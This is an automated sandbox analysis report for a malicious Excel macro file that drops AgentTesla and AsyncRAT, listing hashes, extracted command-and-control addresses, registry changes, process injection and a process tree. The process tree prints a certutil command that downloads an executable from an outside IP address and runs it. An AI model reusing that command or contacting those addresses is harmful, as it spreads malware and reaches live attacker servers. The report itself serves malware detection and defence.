agenttesla | 7933ad4edab82e52f977bc9623aa7b24f63ac959efbf1cd5c8ecf73a4207b9c1

Analysis

max time kernel
118s
max time network
149s
platform
windows7_x64
resource
win7-20220414-en
submitted
30-06-2022 15:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Order1040258.xlsm
Size

431KB
MD5

a7a4f3a4aa943e3bd5e78789cec486d6
SHA1

6bc828610e03758ea7121983b9e281b8e8b6fb47
SHA256

7933ad4edab82e52f977bc9623aa7b24f63ac959efbf1cd5c8ecf73a4207b9c1
SHA512

863820cc0e7cabbf18653ebda72bc2357624257f29f886a3f06c8fec4a53cf0f309117467c92a7da929d51d01f3eed1dac328301621224ed8cf28807afa92445

Score

10^/10

agenttesla asyncrat default collection keylogger persistence rat spyware stealer suricata trojan

Malware Config

Extracted

Family

agenttesla

http://136.144.41.76/bray/inc/a4a9ffb236214a.php

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

127.0.0.1:1111

62.197.136.167:6606

62.197.136.167:7707

62.197.136.167:8808

62.197.136.167:1111

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	844	1964	cmd.exe	EXCEL.EXE

suricata: ET MALWARE AgentTesla Communicating with CnC Server
suricata: ET MALWARE AgentTesla Communicating with CnC Server
suricata
suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata

Async RAT payload 6 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/1240-124-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/1240-123-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/1240-125-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/1240-126-0x000000000040C75E-mapping.dmp	asyncrat
behavioral1/memory/1240-130-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/1240-128-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

InstallUtil.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts InstallUtil.exe
Executes dropped EXE 2 IoCs

Processes:

Agynyddjasev.exe.exeCrstwuze5m.exe

pid process

1972 Agynyddjasev.exe.exe
1268 Crstwuze5m.exe
Loads dropped DLL 2 IoCs

Processes:

cmd.exeAgynyddjasev.exe.exe

pid process

844 cmd.exe
1972 Agynyddjasev.exe.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	InstallUtil.exe

pid	process
1972	Agynyddjasev.exe.exe
1268	Crstwuze5m.exe

pid	process
844	cmd.exe
1972	Agynyddjasev.exe.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

InstallUtil.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	InstallUtil.exe
Key opened	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	InstallUtil.exe
Key opened	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	InstallUtil.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Crstwuze5m.exeAgynyddjasev.exe.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\Aeigqqh = "\"C:\\Users\\Admin\\AppData\\Roaming\\Tupbtqbro\\Aeigqqh.exe\""	Crstwuze5m.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\Aeigqqh = "\"C:\\Users\\Admin\\AppData\\Roaming\\Tupbtqbro\\Aeigqqh.exe\""	Agynyddjasev.exe.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Agynyddjasev.exe.exeCrstwuze5m.exe

description	pid	process	target process
PID 1972 set thread context of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1268 set thread context of 1240	1268	Crstwuze5m.exe	InstallUtil.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1964 EXCEL.EXE

pid	process
1964	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exeAgynyddjasev.exe.exeInstallUtil.exepowershell.exeCrstwuze5m.exe

pid	process
1528	powershell.exe
556	powershell.exe
732	powershell.exe
1972	Agynyddjasev.exe.exe
1972	Agynyddjasev.exe.exe
1388	InstallUtil.exe
1388	InstallUtil.exe
1928	powershell.exe
1268	Crstwuze5m.exe
1268	Crstwuze5m.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exeAgynyddjasev.exe.exepowershell.exepowershell.exeInstallUtil.exeCrstwuze5m.exepowershell.exeInstallUtil.exe

description	pid	process
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	1972	Agynyddjasev.exe.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	732	powershell.exe
Token: SeDebugPrivilege	1388	InstallUtil.exe
Token: SeDebugPrivilege	1268	Crstwuze5m.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	1240	InstallUtil.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

EXCEL.EXEInstallUtil.exe

pid process

1964 EXCEL.EXE
1964 EXCEL.EXE
1964 EXCEL.EXE
1388 InstallUtil.exe

pid	process
1964	EXCEL.EXE
1964	EXCEL.EXE
1964	EXCEL.EXE
1388	InstallUtil.exe

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

EXCEL.EXEcmd.exeAgynyddjasev.exe.exeCrstwuze5m.exe

description	pid	process	target process
PID 1964 wrote to memory of 844	1964	EXCEL.EXE	cmd.exe
PID 1964 wrote to memory of 844	1964	EXCEL.EXE	cmd.exe
PID 1964 wrote to memory of 844	1964	EXCEL.EXE	cmd.exe
PID 1964 wrote to memory of 844	1964	EXCEL.EXE	cmd.exe
PID 844 wrote to memory of 2004	844	cmd.exe	certutil.exe
PID 844 wrote to memory of 2004	844	cmd.exe	certutil.exe
PID 844 wrote to memory of 2004	844	cmd.exe	certutil.exe
PID 844 wrote to memory of 2004	844	cmd.exe	certutil.exe
PID 844 wrote to memory of 1972	844	cmd.exe	Agynyddjasev.exe.exe
PID 844 wrote to memory of 1972	844	cmd.exe	Agynyddjasev.exe.exe
PID 844 wrote to memory of 1972	844	cmd.exe	Agynyddjasev.exe.exe
PID 844 wrote to memory of 1972	844	cmd.exe	Agynyddjasev.exe.exe
PID 1972 wrote to memory of 1528	1972	Agynyddjasev.exe.exe	powershell.exe
PID 1972 wrote to memory of 1528	1972	Agynyddjasev.exe.exe	powershell.exe
PID 1972 wrote to memory of 1528	1972	Agynyddjasev.exe.exe	powershell.exe
PID 1972 wrote to memory of 1528	1972	Agynyddjasev.exe.exe	powershell.exe
PID 1972 wrote to memory of 556	1972	Agynyddjasev.exe.exe	powershell.exe
PID 1972 wrote to memory of 556	1972	Agynyddjasev.exe.exe	powershell.exe
PID 1972 wrote to memory of 556	1972	Agynyddjasev.exe.exe	powershell.exe
PID 1972 wrote to memory of 556	1972	Agynyddjasev.exe.exe	powershell.exe
PID 1972 wrote to memory of 1268	1972	Agynyddjasev.exe.exe	Crstwuze5m.exe
PID 1972 wrote to memory of 1268	1972	Agynyddjasev.exe.exe	Crstwuze5m.exe
PID 1972 wrote to memory of 1268	1972	Agynyddjasev.exe.exe	Crstwuze5m.exe
PID 1972 wrote to memory of 1268	1972	Agynyddjasev.exe.exe	Crstwuze5m.exe
PID 1268 wrote to memory of 732	1268	Crstwuze5m.exe	powershell.exe
PID 1268 wrote to memory of 732	1268	Crstwuze5m.exe	powershell.exe
PID 1268 wrote to memory of 732	1268	Crstwuze5m.exe	powershell.exe
PID 1268 wrote to memory of 732	1268	Crstwuze5m.exe	powershell.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1972 wrote to memory of 1388	1972	Agynyddjasev.exe.exe	InstallUtil.exe
PID 1268 wrote to memory of 1928	1268	Crstwuze5m.exe	powershell.exe
PID 1268 wrote to memory of 1928	1268	Crstwuze5m.exe	powershell.exe
PID 1268 wrote to memory of 1928	1268	Crstwuze5m.exe	powershell.exe
PID 1268 wrote to memory of 1928	1268	Crstwuze5m.exe	powershell.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe
PID 1268 wrote to memory of 1240	1268	Crstwuze5m.exe	InstallUtil.exe

outlook_office_path 1 IoCs

Processes:

InstallUtil.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	InstallUtil.exe

outlook_win_path 1 IoCs

Processes:

InstallUtil.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	InstallUtil.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Order1040258.xlsm
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\SysWOW64\cmd.exe
cmd /c certutil.exe -urlcache -split -f "http://46.249.35.196/mid/Order1040258.exe" Agynyddjasev.exe.exe && Agynyddjasev.exe.exe
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\SysWOW64\certutil.exe
certutil.exe -urlcache -split -f "http://46.249.35.196/mid/Order1040258.exe" Agynyddjasev.exe.exe
3⤵
PID:2004

C:\Users\Admin\Documents\Agynyddjasev.exe.exe
Agynyddjasev.exe.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
